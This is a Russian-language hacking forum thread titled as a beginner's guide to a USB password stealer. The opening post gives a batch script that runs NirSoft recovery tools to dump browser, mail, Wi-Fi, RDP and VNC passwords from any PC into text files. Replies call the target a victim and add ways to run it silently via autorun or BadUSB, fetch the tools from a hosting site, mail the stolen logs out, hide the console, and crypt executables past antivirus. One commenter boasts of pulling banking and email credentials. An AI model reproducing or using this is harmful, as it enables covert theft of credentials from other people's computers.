Статья Создаем USB stealer паролей (для начинающих)

Приветсвую!
Мой первый пост, так что не судите строго
В этой статье, уважаемый %username%, ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (кражи) паролей с нужной для тебя рабочей станции.

​

Что же нам для этого надо:
1) usb флюшка
2) продукты от Nirsoft'a, которые можно скачать бесплатно с офф. сайта

Ссылка скрыта от гостей

:

• MessenPass
• Mail PassView
• Protected Storage PassView
• Dialupass
• BulletsPassView
• Network Password Recovery
• SniffPass Password Sniffer
• RouterPassView
• PstPassword
• WebBrowserPassView
• WirelessKeyView
• Remote Desktop PassView
• VNCPassView

После того, как вы скачали вышеуказанный софт, его следует перенести на сам флеш-диск.

3) Открываем блокнот, после чего вставляем в него следующее содержимое:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt

после сохранив его как backup.bat, копируем на флешку.

4) Вуаля, вы восхитительны! Можете вставить флешку в любой ПК, запустить backup.bat и у вас создадутся *.txt файлы с паролями браузеров, wifi, vnc и т.д.

От автора:
1) в чем плюс данного метода? вышеуказанный софт, вы качаете с офф.сайта (собственно уже можно быть уверенным, что к ним не привязаны другие вирусы от автора статьи)
2) также можно воспользоваться данной тулзой: The LaZagne Project , если будет интересно запилю howto на русском языке.

 

[Valkiria]

Наверное, можно добавить файл autorun.inf в корень флэшки.
Если у жертвы на компе не отключен автозапуск со сменных носителей, то и запускать вручную ничего не нужно ))

А как отреагирует на запуск этих программ UAC ?

 

[Глюк]

также можно воспользоваться данной тулзой: The LaZagne Project , если будет интересно запилю howto на русском языке.

конечно интересно....
я очень давно делал подобную флешку для виндовс систем на лазанье... где то на старых дисках даже батник должен остаться... но время бежит и всё меняется. может я безнадёжно отстал от прогресса.... )))

 

[MLNK]

Наверное, можно добавить файл autorun.inf в корень флэшки.
Если у жертвы на компе не отключен автозапуск со сменных носителей, то и запускать вручную ничего не нужно ))

А как отреагирует на запуск этих программ UAC ?

начиная с виндовс 7 отключено вендором. после чего обновление функция была отключена на Хр и висте

 

[MLNK]

конечно интересно....
я очень давно делал подобную флешку для виндовс систем на лазанье... где то на старых дисках даже батник должен остаться... но время бежит и всё меняется. может я безнадёжно отстал от прогресса.... )))

на странице проекта всё описанно, работает не плохо но некоторы АВ ругаются.

 

[Xulinam]

неплохо так пароли вспоминает) однако от vk и фэйсбука не вспомнила))

 

[swap3r]

интегрировать с атаками типа badusb будет в самый раз. стилер, скачивающий в тихом режиме с некоего хостинга заранее подготовленный sfx архив с утилитами нирсофта, быстренько запускающий батник, который будет содержать еще отправку логов куда-то на мейл (можно добавить консольную мейл отправлялку в архив и команду на ее запуск в батник, как-то так)

 

[Xulinam]

быстренько запускающий батник, который будет содержать еще отправку логов куда-то на мейл

При запуске )) появляеться Окно ДОСА!!!!!!!!! и если он не находит от куда востанавливать пароли то пишет ошибку!! тоесть не заметно это не прокатит(

 

[swap3r]

При запуске )) появляеться Окно ДОСА!!!!!!!!! и если он не находит от куда востанавливать пароли то пишет ошибку!! тоесть не заметно это не прокатит(

только что проверил на тестовом скрипте из нескольких строчек. Действительно окошко консоли появляется, но ненадолго. Если перенаправить вывод в файл (вот так ">"), то, по идее не должно появляться, либо появиться совсем ненадолго. ошибки можно либо перенаправлять в файл, либо "пофиксить" их в екзешниках нирфовтового софта (удалив лишние диалоги в ресурсах, например).
Кому надо - тот найдет правильный путь

 

[Xulinam]

либо "пофиксить" их в екзешниках нирфовтового софта (удалив лишние диалоги в ресурсах, например).
Кому надо - тот найдет правильный путь

так это понятно)) просто я говорю что вижу по факту)))))

 

[Asset030303]

Нефига в текстовой файл не записывается он) Тупа открылись все проги и че? А авто не сохраняет, доработать надо батник

 

[Xulinam]

Нефига в текстовой файл не записывается он) Тупа открылись все проги и че? А авто не сохраняет, доработать надо батник

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt

все отлично сохранет проверенно на вин10

 

[Asset030303]

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt

все отлично сохранет проверенно на вин10

Я только что запустил для одной проге как легкий пример, например тот же WebBrowserPassView, он не сохраняет все найденные пароли в текстовой док, а просто откроет прогу и рядом его cfg файл и тогда какой смысл самого батника !

mailpv также не работает, просто пустое окно открывается проги и все)

 

[MLNK]

кстати очень похоже на перевод статьи

Ссылка скрыта от гостей

 

[☠xrahitel☠]

вот это хорошо тащит ModDumper у меня вытащила от киви,хостинг,gmail,банкмм tinkoff.ru,яндекс,vk.com,blockchain.info,yahoo.com,mail,amazon.com,rambler.ru

осталось терпиле подгрузить ну это Вы сами у же.

 

[subvert]

вот это хорошо тащит ModDumper у меня вытащила от киви,хостинг,gmail,банкмм tinkoff.ru,яндекс,vk.com,blockchain.info,yahoo.com,mail,amazon.com,rambler.ru

осталось терпиле подгрузить ну это Вы сами у же.

не работает с кириллическим именем пользователя Windows.

 

[☠xrahitel☠]

не работает с кириллическим именем пользователя Windows.

Ссылка скрыта от гостей

можно прочитать

Ссылка скрыта от гостей

но там старая версия тащит от жабы да учетак все что есть на компе

если за были пароль от своего дедика потерянного в 2016 не х.. страшного.

 

[wittmann404]

Какая команда в батнике должна быть чтобы ModDumper записывал все в файлик?

 

[Sunnych]

Приветсвую!
Мой первый пост, так что не судите строго
​

​

Nirsoft распознается Windows 10 как вирусные программы :-( проверенно давным давно, только что перепроверил, без внесения в исключения файлы Nirsoft удаляются

 

[MLNK]

​

Nirsoft распознается Windows 10 как вирусные программы :-( проверенно давным давно, только что перепроверил, без внесения в исключения файлы Nirsoft удаляются

попробуй прячем вредоносный файл (криптовка ехе)